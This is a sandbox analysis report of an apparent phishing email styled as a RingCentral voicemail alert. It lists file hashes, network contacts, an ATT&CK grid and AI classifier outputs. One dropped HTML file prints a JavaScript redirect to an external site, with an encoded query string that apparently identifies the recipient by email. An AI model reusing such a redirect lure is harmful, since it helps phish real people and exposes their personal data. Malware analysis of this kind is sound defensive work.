Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account Manager13
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
studiomvs.com
201.139.2.181
truefalse
    unknown
    www.google.com
    142.250.185.164
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://studiomvs.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V1doQlZrOD0mdWlkPVVTRVIxNjEwMjAyNFUzMDEwMTYxNw==N0123NYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20=false
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        52.113.194.132
        unknownUnited States
        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        142.250.185.78
        unknownUnited States
        15169GOOGLEUSfalse
        1.1.1.1
        unknownAustralia
        13335CLOUDFLARENETUSfalse
        216.58.212.138
        unknownUnited States
        15169GOOGLEUSfalse
        52.109.89.18
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        52.109.68.130
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        142.250.186.163
        unknownUnited States
        15169GOOGLEUSfalse
        172.217.23.106
        unknownUnited States
        15169GOOGLEUSfalse
        201.139.2.181
        studiomvs.comMexico
        18449MVSNetSAdeCVMXfalse
        104.208.16.92
        unknownUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        64.233.167.84
        unknownUnited States
        15169GOOGLEUSfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        142.250.185.164
        www.google.comUnited States
        15169GOOGLEUSfalse
        172.217.16.195
        unknownUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.16
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1546273
        Start date and time:2024-10-31 17:48:49 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsinteractivecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:17
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • EGA enabled
        Analysis Mode:stream
        Analysis stop reason:Timeout
        Sample name:Missed VM Alert from RingCentral.eml
        Detection:CLEAN
        Classification:clean2.winEML@20/65@6/100
        Cookbook Comments:
        • Found application associated with file extension: .eml
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 104.208.16.92
        • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, slscr.update.microsoft.com, prod.configsvc1.live.com.akadns.net, weu-azsc-config.officeapps.live.com, s-0005-office.config.skype.com, mobile.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdcus23.centralus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetValueKey calls found.
        • VT rate limit hit for: Missed VM Alert from RingCentral.eml
        InputOutput
        URL: https://studiomvs.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V1doQlZrOD0mdWlkPVVTRVIxNjEwMjAyNFUzMDEwMTYxNw==N0123NYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20= Model: claude-3-haiku-20240307
        ```json
        {
          "contains_trigger_text": false,
          "trigger_text": "unknown",
          "prominent_button_name": "Enviar",
          "text_input_field_labels": "Buscar ...",
          "pdf_icon_visible": false,
          "has_visible_captcha": false,
          "has_urgent_text": false,
          "has_visible_qrcode": false
        }
        URL: Model: claude-3-5-sonnet-latest
        {
            "typosquatting": false,
            "unusual_query_string": false,
            "suspicious_tld": false,
            "ip_in_url": false,
            "long_subdomain": false,
            "malicious_keywords": false,
            "encoded_characters": false,
            "redirection": false,
            "contains_email_address": false,
            "known_domain": false,
            "brand_spoofing_attempt": false,
            "third_party_hosting": false
        }
        URL: URL: https://studiomvs.com
        URL: https://studiomvs.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V1doQlZrOD0mdWlkPVVTRVIxNjEwMjAyNFUzMDEwMTYxNw==N0123NYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20= Model: claude-3-haiku-20240307
        ```json
        {
          "brands": [
            "Studiomvs"
          ]
        }
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:modified
        Size (bytes):231348
        Entropy (8bit):4.386083826740007
        Encrypted:false
        SSDEEP:
        MD5:F672101D3A650486DC86E2FDD05BF13E
        SHA1:A4967DF00E7300D9BFAC3BAC504B0C84DD1CBBAB
        SHA-256:13D6A25BD0E6E1DC232A195E35DC98285835299200B9B50CF49229ABC2A1FEF3
        SHA-512:4FA08A12412BB8284D8F2997BCA9B1052FA39B100FAFDA75A495D3F82F79298A27EF17E43C399CBE3D5C5E795E4A633D15DCF9E209C59B6A140FE95081916F3F
        Malicious:false
        Reputation:unknown
        Preview:TH02...... .0.8.+......SM01X...,...P.,.+..........IPM.Activity...........h...............h............H..h.........C....h........ ...H..h\cal ...pDat...h....0...(......hC.\............h........_`Pk...h..\.@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. hW?9n....@.....#h....8.........$h .......8....."h..............'h..............1hC.\.<.........0h....4....Uk../h....h.....UkH..h...p........-h .......l.....+h..\................. ...... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):180288
        Entropy (8bit):5.29099987527024
        Encrypted:false
        SSDEEP:
        MD5:D512746F473CB6DF8E8D95E171EA9065
        SHA1:4515BAE380C6B82D241130B13251175E224542AF
        SHA-256:E8BA1E0952BA3D0E9F232300091B01529B3CCFE9EBC4F3EB4A3AC66C2B636E19
        SHA-512:DE8E57A68D253E0DA53E514F225264EC2B2355C225DD4A41F468814FE93A1F99EB280C2D493F3FBC2E18789111C7B5F95EE1BF41670778B2503EA7EC992B6EF9
        Malicious:false
        Reputation:unknown
        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-31T16:49:23">.. Build: 16.0.18222.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):32768
        Entropy (8bit):0.04616353740967531
        Encrypted:false
        SSDEEP:
        MD5:21E1DDC13A529898BFCC05BF7F442844
        SHA1:ED1BE5C133CFDC5F19ABE75B2728E277B580A115
        SHA-256:6740B183540A6F5C304878DB96E615C2FEE59DCB331E66BFF2E75470710EDAA2
        SHA-512:EC1A0AA489633EAE8F8CBCFB48B3B0BE0D9719C6DC27463E146A70EDDAED229E02652BFDB6CAA269FE9A90D43C89C1412855B12109D46C0032AD28595CE75435
        Malicious:false
        Reputation:unknown
        Preview:..-.....................8HBw.....P.....C@.L......-.....................8HBw.....P.....C@.L............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:SQLite Write-Ahead Log, version 3007000
        Category:modified
        Size (bytes):49472
        Entropy (8bit):0.4845785893338327
        Encrypted:false
        SSDEEP:
        MD5:181C22D77DEF60BF5C7A9A6B11A881C1
        SHA1:7626645950148C44BC8CDC5420D1F618F4522997
        SHA-256:03B73D3FEFE792B286350EC1962AF568221F1A7F883A608A51E88758238D5839
        SHA-512:B8E9585966B1BDCCCE66D41A91EC9185B035C8482E36827CBD62B3EC1935A284FE586FDE8B575A44F277F857A0602ECD88B635030EFF49F8AC8C4770705045E6
        Malicious:false
        Reputation:unknown
        Preview:7....-............P......7.....^..........P......&E..SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):338
        Entropy (8bit):5.764060555488734
        Encrypted:false
        SSDEEP:
        MD5:50251EDFF874E7AB948AFC05E52582BE
        SHA1:42AC10F8A1F0635833B1079636A208485F4A9B0B
        SHA-256:966D9737BF1FAD0362FFC2A343F2E5F7D0F10C9231D95C217B14AF2FB87AEE5D
        SHA-512:58959C12AA35647927210089BD7BA07D68AE1A4077C7BB3445E5AA9B686E6DB5B5A0943A9D6EF9C61B8ED89F17C8675A01EB3EAC02C6D5A9EACFA31F905CD32A
        Malicious:false
        Reputation:unknown
        Preview:..<html> ..<head> ..<title>Detail notification for www.cbc.ca</title> ..</head> ..<body> ..<SCRIPT LANGUAGE="JavaScript"> .. ..self.location = 'https://studiomvs.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V1doQlZrOD0mdWlkPVVTRVIxNjEwMjAyNFUzMDEwMTYxNw==N0123NYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20='; ..//--> ..</SCRIPT> ..</body> ..</html>
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:
        MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
        SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
        SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
        SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
        Malicious:false
        Reputation:unknown
        Preview:[ZoneTransfer]..ZoneId=3..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:ASCII text, with very long lines (28762), with CRLF line terminators
        Category:dropped
        Size (bytes):20971520
        Entropy (8bit):0.1604461145551905
        Encrypted:false
        SSDEEP:
        MD5:10A33D94389294FD06AF96002D573848
        SHA1:55E726EE2E866E58AE875D0212C1BC431E48A0A3
        SHA-256:2F03F6328693C866864F30DA7C17488B552DE04767CD3FAADBA161BB3A90F9F3
        SHA-512:61780E174315DFCB87CE02CC0623862478A2FDF9B1799ACAE17E953A93A23141A81566F16E5F9129A9165E6C5EB0A997DC77A1542A9DDFB3F0BCC9FA540D940E
        Malicious:false
        Reputation:unknown
        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/31/2024 16:49:21.016.OUTLOOK (0x17F8).0x196C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":22,"Time":"2024-10-31T16:49:21.016Z","Contract":"Office.System.Activity","Activity.CV":"hevLIznQ202cN6rWoK9CEA.4.9","Activity.Duration":16,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/31/2024 16:49:21.048.OUTLOOK (0x17F8).0x196C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-10-31T16:49:21.048Z","Contract":"Office.System.Activity","Activity.CV":"hevLIznQ202cN6rWoK9CEA.4.10","Activity.Duration":14040,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):20971520
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
        Malicious:false
        Reputation:unknown
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:modified
        Size (bytes):110592
        Entropy (8bit):4.500536196141765
        Encrypted:false
        SSDEEP:
        MD5:459DCB1228BB1C369A1DBBDB0FDF82CA
        SHA1:29AF02241414E351838490C091EEE27342437D15
        SHA-256:E9220A6CFE6A5EF011B933121A526736325268EB03353A467FD9A028E158CCEA
        SHA-512:B7484247CD680BD1D3938200782B7353700AF5805ED66D17066856B371BF147FEAC320D653872D764E190845E5FF67A94653104AEE0316EA83E50E533106DA10
        Malicious:false
        Reputation:unknown
        Preview:............................................................................`...l........c$.+..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@....Y...........c$.+..........v.2._.O.U.T.L.O.O.K.:.1.7.f.8.:.1.8.6.2.a.7.8.e.1.3.b.a.4.9.0.4.8.1.1.6.5.2.b.a.e.c.d.5.e.1.3.0...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.3.1.T.1.2.4.9.2.0.0.7.6.0.-.6.1.3.6...e.t.l.......P.P.l........c$.+..........................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):30
        Entropy (8bit):1.2389205950315936
        Encrypted:false
        SSDEEP:
        MD5:BE3EED99C7516888EBA86E3374AEEBD7
        SHA1:EEFD362C85FE1BEEB490AEBAC4EF8ED85FEDB8E4
        SHA-256:C1DEA879777347F3A68A0606BBD1EBD14C81383454F689B1E9D4582BB0300C64
        SHA-512:9F809093DE96BC5C87E9196895E0E1D24400BE50B76F40426F7698799538CA8C41AF941C0A1050D4186E414A652AC85646EA049F4535387530C4550FDDF210B3
        Malicious:false
        Reputation:unknown
        Preview:....i.........................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:Microsoft Outlook email folder (>=2003)
        Category:dropped
        Size (bytes):271360
        Entropy (8bit):2.308960368041405
        Encrypted:false
        SSDEEP:
        MD5:C4A27E105647331ADD5066A045BC38D3
        SHA1:9207227D9DE7FBAAD563A03AC2F439FFBBDEE9E1
        SHA-256:9608CD71FAEB7D3FB0F50A5BFBE5BAB18552E6F5D6AA19AD75C934F49EBB31EC
        SHA-512:53DF043FA5F3876CEBCAF5D934C064B7FAF1D6BF934B511DA15977FD7B72300E22B9362A3962FF405A7A448E3635E394A318FC68BFA0CDC3B66BC55EEF18649A
        Malicious:false
        Reputation:unknown
        Preview:!BDN.l.SM......\...;...................\................@...........@...@...................................@...........................................................................$.......D...............................2..................................................................................................................................................................................................................................................................................................h.......H....|`.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):2.7497050515536268
        Encrypted:false
        SSDEEP:
        MD5:665F2074EA3E1B514B23DCDEBBB24F68
        SHA1:E9959F1B82568C64F3C12E8D8A2538D9AE2D1EE3
        SHA-256:2B6EA12AE2EF49B2F725FB6297C2B7D8AF8141BC51AD40612F3F20A7CDEFDCCA
        SHA-512:88EB267E96EC05E8FE842331661220D46D30E6DB6078060B5A853D44D45C2503B2BC32F0CCB5FE2A264CE7938A94F6F03B3AF4712BB07EFF07E43D5CF448CEA5
        Malicious:false
        Reputation:unknown
        Preview:..UDC...s...........t...+....................#.!BDN.l.SM......\...;...................\................@...........@...@...................................@...........................................................................$.......D...............................2..................................................................................................................................................................................................................................................................................................h.......H....|`.t...+.......B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (15752)
        Category:dropped
        Size (bytes):18726
        Entropy (8bit):4.756109283632968
        Encrypted:false
        SSDEEP:
        MD5:B976B651932BFD25B9DDB5B7693D88A7
        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
        Malicious:false
        Reputation:unknown
        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 3990 x 8, 8-bit/color RGB, non-interlaced
        Category:downloaded
        Size (bytes):3806
        Entropy (8bit):7.938005629968548
        Encrypted:false
        SSDEEP:
        MD5:ECAA6A81AB21B0C9CFF9E6DB806699EF
        SHA1:C7C675DD5DCA4AD93A1AC8445149AD7B1FCA6853
        SHA-256:A572739CEF4BBA6FEC4D11E0D2B7DDD48EEE8D3A6FB44153651F39C10FE6FCE0
        SHA-512:245AA319E055ECC7DC5F1F22BE22FA509467FB9A21A9448A99A85649054E61C040558E7CE877071F2544227FFAAB58ED3F026153145AA9BB08292115FE3AE63C
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/06/pleca-menu.png
        Preview:.PNG........IHDR...............e@....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]k..*.......lf.0.)...t..A/$...'i..B.B.A.....q'../../\^._...(H.)K&..p4n2.[;...0...s.(iHK..0.*V....$95K...H.Z.m-$....|...j`..>!...>S!.S.4..o ......WI.f..;..;5.....$.....s[...=l..qD_N.>.m..^.qe.&. .[.H......g.....8V7..........kT..=$q/........x..m...e..^N..[.E_....'WU..*x.Cp..ia...uD..lf...",A..=...)...`..f..KF.G.).L.-..D<..|.\&.D.8TseF.PFI..0..9*/k..p.3v.~...;U...fI..P.......u...,.!.y..U_+...Z~...q{r....7..."..U.YQ.$..."..v4.|k....Ek..WNJ5..0vU...+..|.l...........$tv...f..n.R...+.zH*=....;i#TKF..).....Z.v.....$.v.;./.....e.6m.i..N..%.....F1J..U......Q....#b.t_....&D{..*.rY,ym.R?.ph..R`o..UV...c).'r...9azK..S.8VV..U?B.n..*.E.......M.x*..iH.z x..1..I..3.....\ .....r.`...1...s..Qb.y..yN..I..EN..._..1.T.<|..u..y..>.L......Og9s..X....p..*..3.|...qXpR....Q.t. ...[.&...*..U.U...4..g.....9&=..."2.y?....!..&x.`.....O.v...u.:.r.".......\.z)..x.|..AS@..@.Y.~...R..h.;.`....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (45047)
        Category:dropped
        Size (bytes):137541
        Entropy (8bit):5.214552493031786
        Encrypted:false
        SSDEEP:
        MD5:3266C8F80B985A3BE04473BCEAEE5F0B
        SHA1:2EAFE5FFDECBCF187C57F70CF7E8E96E466392E0
        SHA-256:25C1BA620B1FD2E9000735C704677C7D618AF09C6B82CB206346DF3CEFFDD495
        SHA-512:C22BE749D1A855BF319FF1D5C63DAA7389B28F9F1BC5429117A7301DDA6AF706777B4AA64753DDBF1A5EBFA2F9071A88B9A0A8EA44B46B964A5C6B689031B600
        Malicious:false
        Reputation:unknown
        Preview:!function(){var t={160:function(){var t=function(t,e){if(window.google){var i=e("#"+t.find(".ekit-google-map").attr("id")),n=i.data("id"),o=i.data("api_key"),s=i.data("map_type"),r=i.data("map_address_type"),a=i.data("map_lat")||23.7808875,h=i.data("map_lng")||90.2792373,l=i.data("map_addr"),c=i.data("map_basic_marker_title"),u=i.data("map_basic_marker_content"),d=i.data("map_basic_marker_icon_enable"),f=i.data("map_basic_marker_icon"),p=i.data("map_basic_marker_icon_width"),m=i.data("map_basic_marker_icon_height"),g=i.data("map_zoom")||14,v=i.data("map_markers"),y=i.data("map_static_width"),_=i.data("map_static_height"),w=i.data("map_polylines"),b=i.data("map_stroke_color"),x=i.data("map_stroke_opacity"),E=i.data("map_stroke_weight"),C=i.data("map_stroke_fill_color"),S=i.data("map_stroke_fill_opacity"),I=i.data("map_overlay_content"),T=i.data("map_routes_origin_lat"),k=i.data("map_routes_origin_lng"),z=i.data("map_routes_dest_lat"),L=i.data("map_routes_dest_lng"),O=i.data("map_routes_
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (3828)
        Category:downloaded
        Size (bytes):3829
        Entropy (8bit):4.776915724199922
        Encrypted:false
        SSDEEP:
        MD5:8BB2B5364DB51ADED1E696F2A19B33CA
        SHA1:67B3ED522E1E35E9AA31C945CFE3802A8813E47C
        SHA-256:683E7DD72E8BF31EADDB50DE149BD4A87D9ED27541B29711A5CBCB1EA3262A45
        SHA-512:909A365A13967BA071B31612C8C09FA87634153CAB1C83413C624BB8379181A4F5C30DC82F2ADD5B1CC5537679D576E3C361DD19DBCB4A15FF9CA1469FF171C3
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.0.7
        Preview:.clearfix::before,.clearfix::after{content:" ";display:table;clear:both}.eael-testimonial-slider.nav-top-left,.eael-testimonial-slider.nav-top-right,.eael-team-slider.nav-top-left,.eael-team-slider.nav-top-right,.eael-logo-carousel.nav-top-left,.eael-logo-carousel.nav-top-right,.eael-post-carousel.nav-top-left,.eael-post-carousel.nav-top-right,.eael-product-carousel.nav-top-left,.eael-product-carousel.nav-top-right{padding-top:40px}.eael-contact-form input[type=text],.eael-contact-form input[type=email],.eael-contact-form input[type=url],.eael-contact-form input[type=tel],.eael-contact-form input[type=date],.eael-contact-form input[type=number],.eael-contact-form textarea{background:#fff;box-shadow:none;-webkit-box-shadow:none;float:none;height:auto;margin:0;outline:0;width:100%}.eael-contact-form input[type=submit]{border:0;float:none;height:auto;margin:0;padding:10px 20px;width:auto;-webkit-transition:all .25s linear 0s;transition:all .25s linear 0s}.eael-contact-form.placeholder-hid
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.995415020359752
        Encrypted:true
        SSDEEP:
        MD5:EB99B23716B8A2F1B36CFFC88370FC1D
        SHA1:4BC6EA41D16D017A747F2E63CA43203E804BC199
        SHA-256:65BABA90AF38E89CA2457BD56268B034A2986F9827DF279A01D3CC70A7C52991
        SHA-512:E9DF7183B7F241774F3735F4E159C2A843B14B3612D6BC2027EF453E795958C3D2F550976CCAE12C0636EC9096E6F931FD2F02C938F19FAA4B913AFF6DFEB45A
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:1
